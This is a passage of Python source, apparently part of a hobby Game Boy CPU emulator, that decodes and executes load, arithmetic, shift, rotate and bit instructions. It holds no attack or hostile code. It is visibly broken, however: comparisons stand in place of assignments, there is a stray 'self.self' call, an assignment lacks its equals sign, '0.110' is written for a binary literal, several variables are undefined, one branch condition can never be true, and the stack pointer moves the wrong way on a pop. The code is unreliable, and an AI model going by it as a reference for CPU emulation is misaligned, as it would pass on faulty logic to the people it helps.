memaddr = self.reg.getReg(self.reg.RegC) + 0xFF00
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
elif(self.opcode == 3 and self.r == 0b100 and self.rp == 0b010): #mem[0xFF00 + C] <- A
memaddr = self.reg.getReg(self.reg.RegC) + 0xFF00
tmp = self.reg.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
elif(self.opcode == 3 and self.r == 0b110 and self.rp == 0b000): #A <- mem[n]
self.fetch()
self.decode()
tmp = self.mem.read(self.n)
self.reg.setReg(self.reg.RegA, tmp)
elif(self.opcode == 3 and self.r == 0b100 and self.rp == 0b000): #mem[n] <- A
self.fetch()
self.decode()
tmp = self.reg.getReg(self.reg.RegA)
memaddr = 0xFF00 + self.n #this only writes into mem >= 0xFF00
self.mem.write(memaddr, tmp)
elif(self.opcode == 3 and self.r == 0b111 and self.rp == 0b010): #A <- mem[nn]
self.fetch()
self.decode()
memaddr = self.n << 8
self.fetch()
self.decode()
memaddr = memaddr + self.n
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
elif(self.opcode == 3 and self.r == 0b101 and self.rp == 0b010): #mem[nn] <- A
self.fetch()
self.decode()
memaddr = self.n << 8
self.fetch()
self.decode()
memaddr = memaddr + self.n
tmp = self.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
elif(self.opcode == 0 and self.r == 0b101 and self.rp == 0b010): #A <- mem[HL], HL = HL + 1
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
memaddr = memaddr + 1
self.reg.setPair("hl", memaddr)
elif(self.opcode == 0 and self.r == 0b111 and self.rp == 0b010): #A <- mem[HL], HL = HL - 1
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
self.reg.setReg(self.reg.RegA, tmp)
memaddr = memaddr - 1
self.reg.setPair("hl", memaddr)
elif(self.opcode == 0 and self.r == 0b000 and self.rp == 0b010): #mem[BC] <- A
memaddr = self.reg.getPair("bc")
tmp = self.reg.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
elif(self.opcode == 0 and self.r == 0b010 and self.rp == 0b010): #mem[DE] <- A
memaddr = self.reg.getPair("de")
tmp = self.reg.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
elif(self.opcode == 0 and self.r == 0b100 and self.rp == 0b010): #mem[HL] <- A, HL = HL + 1
memaddr = self.reg.getPair("hl")
tmp = self.reg.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
memaddr = memaddr + 1
self.reg.setPair("hl", memaddr)
elif(self.opcode == 0 and self.r == 0b110 and self.rp == 0b010): #mem[HL] <- A, HL = HL - 1
memaddr = self.reg.getPair("hl")
tmp = self.reg.getReg(self.reg.RegA)
self.mem.write(memaddr, tmp)
memaddr = memaddr - 1
self.reg.setPair("hl", memaddr)
#16 bit load instructions
elif(self.opcode == 0 and self.rp == 0b001 and self.r%2 == 0): #dd <- nn
if(self.r == 0b000):
pair = "bc"
elif(self.r == 0b010):
pair = "de"
elif(self.r == 0b100):
pair = "hl"
elif(self.r == 0b110):
pair = "sp"
self.fetch()
self.decode()
tmp = self.n
self.fetch()
self.decode()
tmp = tmp | (self.n << 8)
self.reg.setPair(pair, tmp)
elif(self.opcode == 3 and self.r == 0b111 and self.rp == 0b001): #SP <- HL
tmp = self.reg.getPair("hl")
self.reg.setPair("sp", tmp)
elif(self.opcode == 3 and self.rp == 0b101 and self.r%2 == 0): #mem[SP-1] <- ddH, mem[SP-2] <- ddL
memaddr = self.reg.getReg("sp")
if(self.r == 0b000):
pair = "bc"
elif(self.r == 0b010):
pair = "de"
elif(self.r == 0b100):
pair = "hl"
elif(self.r == 0b110):
pair = "af"
tmp = self.reg.getPair(pair)
low = tmp & 0b11111111
high = tmp >> 8
self.mem.write(memaddr - 1, high)
self.mem.write(memaddr - 2, low)
self.reg.setReg("sp", memaddr - 2)
elif(self.opcode == 3 and self.rp == 0b001 and self.r%2 == 0): #qqL <- mem[SP], qqH <- mem[SP+1], SP <- SP + 2
memaddr = self.reg.getReg("sp")
if(self.r == 0b000):
hreg == self.reg.RegB
lreg == self.reg.RegC
elif(self.r == 0b010):
hreg == self.reg.RegD
lreg == self.reg.RegE
elif(self.r == 0b100):
hreg == self.reg.RegH
lreg == self.reg.RegL
elif(self.r == 0b110):
hreg == self.reg.RegA
lreg == "f"
tmpL = self.mem.read(memaddr)
tmpH = self.mem.read(memaddr + 1)
self.reg.setReg(lreg, tmpL)
self.reg.setReg(hreg, tmpH)
self.reg.setReg("sp", memaddr - 2)
elif(self.opcode == 3 and self.r == 0b111 and self.rp == 0b000): #HL <- SP + e
self.fetch()
self.decode()
tmp = self.reg.getReg("sp")
res = tmp + self.n
self.reg.setPair("hl", res)
self.reg.setFlag('z', 0)
self.reg.setFlag('n', 0)
if((tmp >> 11) & 0b01 == (res >> 11) & 0b01):
self.reg.setFlag('h', 0) #carry from 11th bit...
else:
self.reg.setFlag('h', 1)
self.reg.setFlag('cy', (tmp & (1 << 16)) >> 16) #check for carry bit at end
elif(self.opcode == 0 and self.r == 0b001 and self.rp == 0b000): #mem[nn] <- SPl, mem[nn+1] <-SPh
self.fetch()
self.decode()
memaddr = self.n
self.fetch()
self.decode()
memaddr = memaddr | (self.n << 8)
tmp = self.getReg("sp")
tmpL = tmp & 0b11111111
tmpH = tmp >> 8
self.mem.write(memaddr, tmpL)
self.mem.write(memaddr + 1, tmpH)
#8 bit arithmatic operations
elif(self.opcode == 2 and self.r == 0b000 and self.rp != 0b110): #A <- A + rp
regA = self.reg.getReg(self.regA)
tmp = self.reg.getReg(self.rp)
res = tmp + regA
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
tmp4 = (tmp & 0b1000) >> 3
A4 = (regA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4) #exclusive or the fourth bit s including result to find if their was a carry
self.reg.setFlag('cy', res >> 8)
elif(self.opcode == 3 and self.r == 0b000 and self.rp == 0b110): #A <- A + n
self.fetch()
self.decode()
tmpA = self.getReg(self.RegA)
tmp = self.n
res = tmpA + tmp
self.reg.setReg(self.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', res >> 8)
tmp4 = (tmp & 0b1000) >> 3
A4 = (regA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4)
elif(self.opcode == 2 and self.r == 0b000 and self.r == 0b110): #A <- A + mem[HL]
memaddr = self.reg.getPair("hl")
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.mem.read(memaddr)
res = tmp + tmpA
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', res >> 8)
tmp4 = (tmp & 0b1000) >> 3
A4 = (regA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4)
elif(self.opcode == 2 and self.r == 0b001 and self.rp != 0b110): #A <- A + rp + CY
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
CY = self.reg.getFlag('cy')
res = tmpA + tmp + CY
self.reg.setReg(self.reg.RegA, tmpA + tmp + CY)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', res >> 8)
tmp4 = (tmp & 0b1000) >> 3
A4 = (tmpA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4)
elif(self.opcode == 3 and self.r == 0b001 and self.rp == 0b110): #A <- A + n + CY
tmpA = self.reg.getReg(self.reg.RegA)
CY = self.reg.getFlag('cy')
self.fetch()
self.decode()
res = tmpA + self.n + CY
self.reg.setReg(self.reg.RegA, tmp)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', res >> 8)
tmp4 = (tmp & 0b1000) >> 3
A4 = (regA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4)
elif(self.opcode == 2 and self.r == 0b001 and self.rp == 0b110): #A <- A + mem[HL] + CY
tmpA = self.reg.getReg(self.reg.RegA)
CY = self.reg.cy #TODO: Implement this...
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA + tmp + CY
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', res >> 8)
tmp4 = (tmp & 0b1000) >> 3
A4 = (regA & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ A4 ^ res4)
elif(self.opcode == 2 and self.r == 0b010 and self.rp != 0b110): #A <- A - rp
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
res = tmpA - tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if (tmpA >> 7) == 0 and (tmp >> 7) == 1 else 0) #check for borrowing
tmp4 = (tmp & 0b100) >> 2
A4 = (self.reg.RegA & 0b100) >> 2
self.reg.setFlag('h', 1 if A4 == 0 and tmp4 == 1 else 0) #borrow from bit four
elif(self.opcode == 3 and self.r == 0b010 and self.rp == 0b110): #A <- A - n
tmpA = self.reg.getReg(self.reg.RegA)
self.fetch()
self.decode()
tmp = self.n
res = tmpA - tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if (tmpA >> 7) == 0 and (tmp >> 7) == 1 else 0) #check for borrowing
tmp4 = (tmp & 0b100) >> 2
A4 = (regA & 0b100) >> 2
self.reg.setFlag('h', 1 if a4 == 0 and tmp4 == 1 else 0) #borrow from bit four
elif(self.opcode == 2 and self.r == 0b010 and self.rp == 0b110): #A <- A - mem[HL]
tmpA = self.reg.getReg(self.reg.RegA)
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA - tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if (tmpA >> 7) == 0 and (tmp >> 7) == 1 else 0) #check for borrowing
tmp4 = (tmp & 0b100) >> 2
A4 = (regA & 0b100) >> 2
self.reg.setFlag('h', 1 if a4 == 0 and tmp4 == 1 else 0) #borrow from bit four
elif(self.opcode == 2 and self.r == 0b011 and self.rp != 0b110): #A <- A - rp - CY
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
CY = self.reg.cy
self.reg.setReg(self.reg.RegA, tmpA - tmp - CY)
elif(self.opcode == 3 and self.r == 0b011 and self.rp == 0b110): #A <- A - n - CY
tmpA = self.reg.getReg(self.reg.RegA)
CY = self.reg.getFlag('cy')
self.fetch()
self.decode()
res = tmpA - self.n - CY
self.self.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if (tmpA >> 7) == 0 and (tmp >> 7) == 1 else 0) #check for borrowing
tmp4 = (tmp & 0b100) >> 2
A4 = (regA & 0b100) >> 2
self.reg.setFlag('h', 1 if a4 == 0 and tmp4 == 1 else 0) #borrow from bit four
elif(self.opcode == 2 and self.r == 0b011 and self.rp == 0b110): #A <- A - mem[HL] - CY
tmpA = self.reg.getReg(self.reg.RegA)
CY = self.reg.cy
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA - tmp - CY
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if (tmpA >> 7) == 0 and (tmp >> 7) == 1 else 0) #check for borrowing
tmp4 = (tmp & 0b100) >> 2
A4 = (regA & 0b100) >> 2
self.reg.setFlag('h', 1 if a4 == 0 and tmp4 == 1 else 0) #borrow from bit four
elif(self.opcode == 2 and self.r == 0b100 and self.rp != 0b110): #A <- A & rp
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
res = tmpA & tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 1)
elif(self.opcode == 3 and self.r == 0b100 and self.rp == 0b110): #A <- A & n
tmpA = self.reg.getReg(self.reg.RegA)
self.fetch()
self.decode()
tmp = self.n
res = tmpA & tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 1)
elif(self.opcode == 2 and self.r == 0b100 and self.rp == 0b110): #A <- A & mem[HL]
tmpA = self.reg.getReg(self.reg.RegA)
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA & tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 1)
elif(self.opcode == 2 and self.r == 0b110 and self.rp != 0b110): #A <- A | rp
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
res = tmpA | tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 3 and self.r == 0b110 and self.rp == 0b110): #A <- A | n
tmpA = self.reg.getReg(self.reg.RegA)
self.fetch()
self.decode()
tmp = self.n
res = tmpA | tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 2 and self.r == 0b110 and self.rp == 0b110): #A <- A | mem[HL]
tmpA = self.reg.getReg(self.reg.RegA)
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA | tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 2 and self.r == 0b101 and self.rp != 0b110): #A <- A xor rp
tmpA = self.reg.getReg(self.reg.RegA)
tmp = self.reg.getReg(self.rp)
res = tmpA ^ tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 3 and self.r == 0b101 and self.rp == 0b110): #A <- A xor n
tmpA = self.reg.getReg(self.reg.RegA)
self.fetch()
self.decode()
res = tmpA ^ self.n
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 2 and self.r == 0b101 and self.rp == 0b110): #A <- A xor mem[HL]
tmpA = self.reg.getReg(self.reg.RegA)
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmpA ^ tmp
self.reg.setReg(self.reg.RegA, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('cy', 0)
self.reg.setFlag('h', 0)
elif(self.opcode == 2 and self.r == 0b111 and self.rp != 0b110): #A == rp
#"Compares the contents and sets flag if they are equal" <- not exactly a helpful description...
tmpA = self.reg.getReg(self.reg.RegA)
tmp == self.reg.getReg(self.rp)
self.reg.setFlag('z', 1 if tmpA == tmp else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if tmpA < tmp else 0)
self.reg.setFlag('h', 1 if tmpA > tmp else 0)
elif(self.opcode == 3 and self.r == 0b111 and self.rp == 0b110): #A == n
tmpA == self.reg.getReg(self.reg.RegA)
self.fetch()
self.decode()
self.reg.setFlag('z', 1 if tmpA == tmp else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if tmpA < tmp else 0)
self.reg.setFlag('h', 1 if tmpA > tmp else 0)
elif(self.opcode == 2 and self.r == 0b111 and self.rp == 0b110): #A == mem[HL]
tmpA == self.reg.getReg(self.reg.RegA)
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
self.reg.setFlag('z', 1 if tmpA == tmp else 0)
self.reg.setFlag('n', 1)
self.reg.setFlag('cy', 1 if tmpA < tmp else 0)
self.reg.setFlag('h', 1 if tmpA > tmp else 0)
elif(self.opcode == 0 and self.r != 0b110 and self.rp == 0b100): #r <- r + 1
tmp == self.reg.getReg(self.r)
res = tmp + 1
self.reg.setReg(self.r, res)
self.reg.setFlag('z', 1 if tmp == 0 else 0)
self.reg.setFlag('n', 0)
tmp4 = (tmp & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ res4)
elif(self.opcode == 0 and self.r == 0b110 and self.rp == 0b100): #mem[HL] <- mem[HL] + 1
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
res = tmp + 1
self.mem.write(memaddr, res)
self.reg.setFlag('z', 1 if tmp == 0 else 0)
self.reg.setFlag('n', 0)
tmp4 = (tmp & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ res4)
elif(self.opcode == 0 and self.r != 0b110 and self.rp == 0b101): #r <- r - 1
tmp = self.reg.getReg(self.r)
res = tmp - 1
self.reg.setReg(self.r, res)
self.reg.setFlag('z', 1 if res == 0 else 0)
self.reg.setFlag('n', 1)
tmp4 = (tmp & 0b1000) >> 3
res4 = (res & 0b1000) >> 3
self.reg.setFlag('h', tmp4 ^ res4)
elif(self.opcode == 0 and self.r == 0b110 and self.rp == 0b101): #mem[HL] <- mem[HL] - 1
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
self.mem.write(memaddr, tmp - 1)
self.reg.setFlag('z', 1 if tmp == 1 else 0)
self.reg.setFlag('n', 1)
tmpbottom = tmp & 0b111
self.reg.setFlag('h', 1 if tmpbottom == 0 else 0)
#16 bit arithmatic operations
elif(self.opcode == 0 and self.r % 2 == 1 and self.rp == 0b001): #HL <- HL + ss
tmpHL = self.reg.getPair("hl")
if(self.r == 0b001):
tmp = self.reg.getPair("bc")
elif(self.r == 0b011):
tmp = self.reg.getPair("de")
elif(self.r == 0b101):
tmp = self.reg.getPair("hl")
elif(self.r == 0b111):
tmp = self.reg.getPair("sp")
res = tmpHL + tmp
self.reg.setPair("hl", res)
self.reg.setFlag('n', 0)
tmp11 = (tmp >> 10) & 0b1
res11 = (res >> 10) & 0b1
tmpHL11 (tmpHL >> 10) & 0b1
self.reg.setFlag('h', tmp11 ^ res11 ^ tmpHL11)
self.reg.setFlag('cy', res >> 15)
elif(self.opcode == 3 and self.r == 0b101 and self.rp == 0b000): #SP <- SP + n
tmpSL = self.reg.getReg("sp")
self.fetch()
self.decode()
tmp = self.n
res = tmpSL + tmp
self.reg.setPair("sp", res)
self.reg.setFlag('z', 0)
self.reg.setFlag('n', 0)
tmp11 = (tmp >> 10) & 0b1
res11 = (res >> 10) & 0b1
tmpSL11 = (tmpSL >> 10) & 0b1
self.reg.setFlag('h', tmp11 ^ res11 ^ tmpSL11)
self.reg.setFlag('cy', res >> 15)
elif(self.opcode == 0 and self.r%2 == 0 and self.rp == 0b011): #ss <- ss + 1
if(self.r == 0b000):
pair = "bc"
elif(self.r == 0b010):
pair = "de"
elif(self.r == 0b100):
pair = "hl"
elif(self.r == 0b110):
pair = "sp"
tmp = self.reg.getPair(pair)
self.reg.setPair(pair, tmp + 1) #No flags get changed
elif(self.opcode == 0 and self.r%2 == 1 and self.rp == 0b011): #ss <- ss - 1
if(self.r == 0b001):
pair = "bc"
elif(self.r == 0b011):
pair = "de"
elif(self.r == 0b101):
pair = "hl"
elif(self.r == 0b111):
pair = "sp"
tmp = self.reg.getPair(pair)
self.reg.setPair(pair, tmp - 1)
#Rotate and Shift
elif(self.opcode == 0 and self.r == 0b000 and self.rp == 0b111): # A << 1 + A[0], CY = A[7]
tmpA = self.reg.getReg(self.reg.RegA)
bit = (tmpA & 0b10000000) >> 7
tmpA = (tmpA << 1) + bit
self.reg.setFlag('cy', bit)
self.reg.setReg(self.reg.RegA, tmpA)
self.reg.setFlag('z', 0)
self.reg.setFlag('h', 0)
self.reg.setFlag('n', 0)
elif(self.opcode == 0 and self.r == 0b010 and self.rp == 0b111): #A << 1 + A[7]
tmpA = self.reg.getReg(self.reg.RegA)
bit = (tmpA & 0b10000000) >> 7
tmpA = (tmpA << 1) | self.reg.cy
self.reg.setFlag('cy', bit)
self.reg.setReg(self.reg.RegA, tmpA)
self.reg.setFlag('z', 0)
self.reg.setFlag('h', 0)
self.reg.setFlag('n', 0)
elif(self.opcode == 0 and self.r == 0b001 and self.rp == 0b111): #A >> 1 + (A[0] << 7)
tmpA = self.reg.getReg(self.reg.RegA)
bit = tmpA & 0b01
tmpA = (tmpA >> 1) | (bit << 7)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.reg.RegA, tmpA)
self.reg.setFlag('z', 0)
self.reg.setFlag('h', 0)
self.reg.setFlag('n', 0)
elif(self.opcode == 0 and self.r == 0b011 and self.rp == 0b111): #A >> 1 + (A[0] << 7)
tmpA = self.reg.getReg(self.reg.RegA)
bit = tmpA & 0b01
tmpA = (tmpA >> 1) | (self.reg.cy << 7)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.reg.RegA, tmpA)
self.reg.setFlag('z', 0)
self.reg.setFlag('h', 0)
self.reg.setFlag('n', 0)
elif(self.opcode == 3 and self.r == 0b001 and self.rp == 0b011): #rshifts of r or (HL)
self.fetch()
self.decode()
if(self.r == 0b000):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1) | bit
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1) | bit
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b010):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1) | self.reg.cy
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1) | self.reg.cy
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b001):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b01)
tmp = (tmp >> 1) | (bit << 7)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
bit = tmp & 0b01
tmp = (tmp >> 1) | (bit << 7)
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b011):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b01)
tmp = (tmp >> 1) | (self.reg.cy << 7)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl") #NOTE: so this is not what the manual said the opcode was, but the manual seems wrong. so if there weird issues later it could be this
tmp = self.mem.read(memaddr)
bit = tmp & 0b01
tmp = (tmp >> 1) | (self.reg.cy << 7)
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b100):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
bit = (tmp & 0b10000000) >> 7
tmp = (tmp << 1)
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b101):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bitL = (tmp & 0b01)
bitH = tmp & 0b10000000
tmp = (tmp >> 1) | bitH
self.reg.setFlag('cy', bitL)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
bitL = tmp & 0b01
bitH = tmp & 0b10000000
tmp = (tmp >> 1) | bitH
self.reg.setFlag('cy', bitL)
self.mem.write(memaddr, tmp)
elif(self.r == 0b111):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
bit = (tmp & 0b01)
tmp = (tmp >> 1)
self.reg.setFlag('cy', bit)
self.reg.setReg(self.rp, tmp)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
bit = tmp & 0b01
tmp = (tmp >> 1)
self.reg.setFlag('cy', bit)
self.mem.write(memaddr, tmp)
elif(self.r == 0b110):
if(self.rp != 0b110):
tmp = self.reg.getReg(self.rp)
low4 = (tmp & 0b01111)
high4 = (tmp & 0b11110000)
tmp = (low4 << 4) | (high4 >> 4)
self.reg.setReg(self.rp, tmp)
self.reg.setFlag('cy', 0)
else:
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
low4 = (tmp & 0b01111)
high4 = (tmp & 0b11110000)
tmp = (low4 << 4) | (high4 >> 4)
self.mem.write(memaddr, tmp)
self.reg.setFlag('cy', 0)
self.reg.setFlag('z', 1 if tmp == 0 else 0)
self.reg.setFlag('n', 0)
self.reg.setFlag('h', 0)
#Bit operations
elif(self.opcode == 3 and self.r == 0b001 and self.rp == 0b011):
self.fetch()
self.decode()
if(self. opcode == 1 and self.rp != 0b110): #move compliment of selected bit to the Zero flags
tmp = self.reg.getReg(self.rp)
if(self.r == 0b000):
bit = tmp & 0b00000001
elif(self.r == 0b001):
bit = (tmp & 0b00000010) >> 1
elif(self.r == 0b010):
bit = (tmp & 0b00000100) >> 2
elif(self.r == 0b011):
bit = (tmp & 0b00001000) >> 3
elif(self.r == 0b100):
bit = (tmp & 0b00010000) >> 4
elif(self.r == 0b101):
bit = (tmp & 0b00100000) >> 5
elif(self.r == 0b110):
bit = (tmp & 0b01000000) >> 6
elif(self.r == 0b111):
bit = (tmp & 0b10000000) >> 7
self.reg.setFlag('z', ~bit)
self.reg.setFlag('h', 1)
self.reg.setFlag('n', 0)
elif(self.opcode == 1 and self.rp == 0b110): #move compliment of selected bit to the Zero flags
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
if(self.r == 0b000):
bit = tmp & 0b00000001
elif(self.r == 0b001):
bit = (tmp & 0b00000010) >> 1
elif(self.r == 0b010):
bit = (tmp & 0b00000100) >> 2
elif(self.r == 0b011):
bit = (tmp & 0b00001000) >> 3
elif(self.r == 0b100):
bit = (tmp & 0b00010000) >> 4
elif(self.r == 0b101):
bit = (tmp & 0b00100000) >> 5
elif(self.r == 0b110):
bit = (tmp & 0b01000000) >> 6
elif(self.r == 0b111):
bit = (tmp & 0b10000000) >> 7
self.reg.setFlag('z', ~bit)
self.reg.setFlag('h', 1)
self.reg.setFlag('n', 0)
elif(self.opcode == 3 and self.rp != 0.110): #set bit to 1
tmp = self.reg.getReg(self.rp)
if(self.r == 0b000):
tmp = tmp | 0b00000001
elif(self.r == 0b001):
tmp = tmp | 0b00000010
elif(self.r == 0b010):
tmp = tmp | 0b00000100
elif(self.r == 0b011):
tmp = tmp | 0b00001000
elif(self.r == 0b100):
tmp = tmp | 0b00010000
elif(self.r == 0b101):
tmp = tmp | 0b00100000
elif(self.r == 0b110):
tmp = tmp | 0b01000000
elif(self.r == 0b111):
tmp = tmp | 0b10000000
self.reg.setReg(self.rp, tmp)
elif(self.opcode == 3 and self.rp == 0b110): #set bit to 1
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
if(self.r == 0b000):
tmp = tmp | 0b00000001
elif(self.r == 0b001):
tmp = tmp | 0b00000010
elif(self.r == 0b010):
tmp = tmp | 0b00000100
elif(self.r == 0b011):
tmp = tmp | 0b00001000
elif(self.r == 0b100):
tmp = tmp | 0b00010000
elif(self.r == 0b101):
tmp = tmp | 0b00100000
elif(self.r == 0b110):
tmp = tmp | 0b01000000
elif(self.r == 0b111):
tmp = tmp | 0b10000000
self.mem.write(memaddr, tmp)
elif(self.opcode == 3 and self.rp != 0b110): #set bit to 0
tmp = self.reg.getReg(self.rp)
if(self.r == 0b000):
tmp = tmp & 0b11111110
elif(self.r == 0b001):
tmp = tmp & 0b11111101
elif(self.r == 0b010):
tmp = tmp & 0b11111011
elif(self.r == 0b011):
tmp = tmp & 0b11110111
elif(self.r == 0b100):
tmp = tmp & 0b11101111
elif(self.r == 0b101):
tmp = tmp & 0b11011111
elif(self.r == 0b110):
tmp = tmp & 0b10111111
elif(self.r == 0b111):
tmp = tmp & 0b01111111
self.reg.setReg(self.rp, tmp)
elif(self.opcode == 3 and self.rp == 0b110): #set bit to 0
memaddr = self.reg.getPair("hl")
tmp = self.mem.read(memaddr)
if(self.r == 0b000):
tmp = tmp & 0b11111110
